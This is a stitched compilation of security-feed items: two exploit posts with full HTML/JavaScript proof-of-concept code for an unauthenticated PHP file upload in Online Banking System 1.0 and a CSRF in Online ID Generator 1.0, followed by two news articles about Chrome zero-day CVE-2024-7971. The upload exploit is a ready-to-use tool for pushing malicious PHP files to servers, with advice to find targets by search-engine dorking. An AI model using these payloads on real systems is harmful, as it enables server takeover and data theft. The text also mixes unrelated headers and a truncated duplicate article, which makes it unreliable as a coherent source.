CVE-2024-36901, CVE-2024-36940,   CVE-2024-39292, CVE-2024-39484

Ubuntu Security Notice USN-6972-1

Online Banking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload PHP malicious files directly.

    [+] Here’s a breakdown of its components and functionality:

    HTML Structure:  
        DOCTYPE & <html>: Defines the document type and language.  
        <head>: Contains meta-information about the document like character encoding and viewport settings, and the title of the page.  
        <body>: Contains the main content of the page.

    Form Elements:  
        <form id="uploadForm">: A form with the ID "uploadForm" that contains input fields and a button for file upload.  
        <label> and <input> fields: Collect information from the user:  
            Target IP: IP address where the file will be uploaded.  
            Attacker IP: The IP address of the attacker (though this field is not used in the script).  
            Attacker Port: The port number of the attacker (not used in the script).  
            File Input: Allows the user to select a file to upload.  
        <button>: A button that triggers the file upload process when clicked.

    JavaScript Functionality:  
        uploadFile(): Function executed when the "Upload File" button is clicked.  
            Collects input values: Retrieves values from the input fields and the selected file.  
            Validation: Checks if all fields are filled and a file is selected. Alerts the user if any field is missing.  
            FormData Object: Creates a FormData object to package the file and additional data (name with the value 'PWNED').  
            fetch API: Sends a POST request to the target IP with the file attached:  
                URL: http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings  
                Response Handling: Logs success or failure based on the server's response. If the response is '1', it indicates success; otherwise, it logs an error.

    Security Note:  
        Potential Risk: This script is for educational purposes, and its functionality (uploading a file to a specified server) could be misused.   
    It’s crucial to ensure that any file upload functionality is properly secured and validated to prevent unauthorized access or attacks.

[+] Line 45 set url of target.

[+] Choose the target IP .

[+] Put any IP address of your own .

[+] Put any port .

[+] The path to upload the files : http://localhost/banking/uploads/

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Direct File Upload</title>  
</head>  
<body>

    <h2>Direct File Upload</h2>  
    <form id="uploadForm">  
        <label for="targetIP">Target IP:</label>  
        <input type="text" id="targetIP" name="targetIP" required><br><br>

        <label for="attackerIP">Attacker IP:</label>  
        <input type="text" id="attackerIP" name="attackerIP" required><br><br>

        <label for="attackerPort">Attacker Port:</label>  
        <input type="number" id="attackerPort" name="attackerPort" required><br><br>

        <label for="fileInput">Select File:</label>  
        <input type="file" id="fileInput" name="fileInput" required><br><br>

        <button type="button" onclick="uploadFile()">Upload File</button>  
    </form>

    <script>  
        function uploadFile() {  
            const targetIP = document.getElementById('targetIP').value;  
            const attackerIP = document.getElementById('attackerIP').value;  
            const attackerPort = document.getElementById('attackerPort').value;  
            const fileInput = document.getElementById('fileInput').files[0];

            if (!targetIP || !attackerIP || !attackerPort || !fileInput) {  
                alert('Please fill in all fields and select a file.');  
                return;  
            }

            const formData = new FormData();  
            formData.append('name', 'PWNED');  
            formData.append('img', fileInput);

            console.log("(+) Uploading file...");

            fetch(`http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings`, {  
                method: 'POST',  
                body: formData  
            })  
            .then(response => response.text())  
            .then(data => {  
                if (data === '1') {  
                    console.log("(+) File upload seems to have been successful!");  
                } else {  
                    console.log("(-) Oh no, the file upload seems to have failed!");  
                }  
            })  
            .catch(error => console.error("(-) Error during file upload:", error));  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Banking System 1.0 Arbitrary File Upload

Online ID Generator version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online ID Generator 1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/id_generator/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online ID Generator 1.0 Cross Site Request Forgery

Google has released an update to Chrome that fixes one zero-day vulnerability and introduces Google Lens for desktop.

Google has released an update for its Chrome browser which includes a patch for a vulnerability that Google says is already being exploited, known as a zero-day vulnerability.

Google has fixed that zero-day with the release of versions 128.0.6613.84/.85 for Windows/macOS and 128.0.6613.84 for Linux that will be rolled out to all users over the coming weeks.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click **Settings > About Chrome**. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is restart the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

_After the update, the version should be 128.0.6613.84/85, or later_

Besides the zero-day, this update contains 37 other security fixes, as well as Google Lens for desktop. This means you’ll be able to search anything you see on the web without leaving your current tab.

Google Lens will be available on every open tab. Here’s how to use it:

1.  Open the **Chrome menu** (three stacked dots).
2.  Select **Search with Google Lens** .
3.  Select anything on the page by clicking and dragging anywhere on the page.
4.  Refine the answers by typing in the search box in the side panel.

Keep in mind though that Google will receive a screenshot of every Google Lens search you do.

**Technical details on the zero-day vulnerability**

A zero-day is a vulnerability in software or hardware that is typically unknown to the vendor and for which no patch or other fix is available. The zero-day vulnerability which is being fixed here is referred to as CVE-2024-7971: a type confusion in V8 in Google Chrome which allowed a remote attacker to exploit heap corruption via a crafted HTML page.

JavaScript uses dynamic typing which means the type of a variable is determined and updated at runtime, as opposed to being set at compile-time in a statically typed language.

V8 is the JavaScript engine that Chrome uses and has been a significant source of security problems.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The outcome can be relatively benign and cause a memory leak, or it may be fatal and cause a memory fault, usually in the program that causes the corruption.

So, an attacker will have to convince a target to open a specially crafted HTML file, which usually means visiting a website. This will cause the unpatched browser to accept an unexpected value for a variable that will cause an overflow of the reserved memory location. The attacker is able to abuse that overflow for their own malicious purposes.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Google patches actively exploited zero-day in Chrome. Update now! 

Google has rolled out security fixes to address a high-severity security flaw in its Chrome browser that it said has come under active exploitation in the wild.
Tracked as CVE-2024-7971, the vulnerability has been described as a type confusion bug in the V8 JavaScript and WebAssembly engine.
"Type confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap

Browser Security / Vulnerability

Google has rolled out security fixes to address a high-severity security flaw in its Chrome browser that it said has come under active exploitation in the wild.

Tracked as **CVE-2024-7971**, the vulnerability has been described as a type confusion bug in the V8 JavaScript and WebAssembly engine.

"Type confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap corruption via a crafted HTML page," according to a description of the bug in the NIST National Vulnerability Database (NVD).

The Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) have been credited with discovering and reporting the flaw on August 19, 2024.

No additional details about the nature of the attacks exploiting the flaw or the identity of the threat actors that may be weaponizing it have been released, primarily to ensure that a majority of the users are updated with a fix.

The tech giant, however, acknowledged in a terse statement that it's "aware that an exploit for CVE-2024-7971 exists in the wild." It's worth mentioning that CVE-2024-7971 is the third type confusion bug that it has patched in V8 this year after CVE-2024-4947 and CVE-2024-5274.

Google has so far addressed nine zero-days in Chrome since the start of 2024, including three that were demonstrated at Pwn2Own 2024 -

*   **CVE-2024-0519** - Out-of-bounds memory access in V8
*   **CVE-2024-2886** - Use-after-free in WebCodecs (demonstrated at Pwn2Own 2024)
*   **CVE-2024-2887** - Type confusion in WebAssembly (demonstrated at Pwn2Own 2024)
*   **CVE-2024-3159** - Out-of-bounds memory access in V8 (demonstrated at Pwn2Own 2024)
*   **CVE-2024-4671** - Use-after-free in Visuals
*   **CVE-2024-4761** - Out-of-bounds write in V8
*   **CVE-2024-4947** - Type confusion in V8
*   **CVE-2024-5274** - Type confusion in V8

Users are recommended to upgrade to Chrome version 128.0.6613.84/.85 for Windows and macOS, and version 128.0.6613.84 for Linux to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google